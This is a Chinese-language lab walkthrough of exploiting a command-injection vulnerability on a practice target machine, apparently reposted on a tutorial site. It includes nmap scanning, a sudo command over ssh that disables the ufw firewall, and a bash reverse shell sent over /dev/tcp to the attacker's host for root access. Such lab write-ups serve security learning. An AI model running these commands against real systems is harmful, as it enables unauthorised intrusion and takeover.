控制指令执行程序
发布时间:2023-05-19 12:38:22 所属栏目:PHP教程 来源:
导读:目录
命令执行漏洞介绍
实验环境
信息探测
nmap -sV 192.168.20.136
访问192.168.20.136:8080
敏感信息探测
进行系统命令执行
列出/tmp目录下的文件
列出/home目录下的内容
读取敏感信
命令执行漏洞介绍
实验环境
信息探测
nmap -sV 192.168.20.136
访问192.168.20.136:8080
敏感信息探测
进行系统命令执行
列出/tmp目录下的文件
列出/home目录下的内容
读取敏感信
|
目录 命令执行漏洞介绍 实验环境 信息探测 nmap -sV 192.168.20.136 访问192.168.20.136:8080 敏感信息探测 进行系统命令执行 列出/tmp目录下的文件 列出/home目录下的内容 读取敏感信息 漏洞利用 利用ssh协议执行root权限的命令 关闭Ubuntu中的防火墙 提权 监听端口 靶机反弹shell 查看flag 命令执行漏洞介绍 当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。 调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。 实验环境 kali 192.168.20.128 靶机 192.168.20.136 提取码:t1x0 信息探测 nmap -sV 192.168.20.136 访问192.168.20.136:8080 发现敏感信息 发现/test.jsp并进行访问 进行系统命令执行 列出/tmp目录下的文件 列出/home目录下的内容 读取敏感信息 漏洞利用 利用ssh协议执行root权限的命令 ssh bill@localhost sudo -l 关闭Ubuntu中的防火墙 ssh bill@localhost sudo ufw disable 提权 监听端口 靶机反弹shell ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1 (编辑:驾考网) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
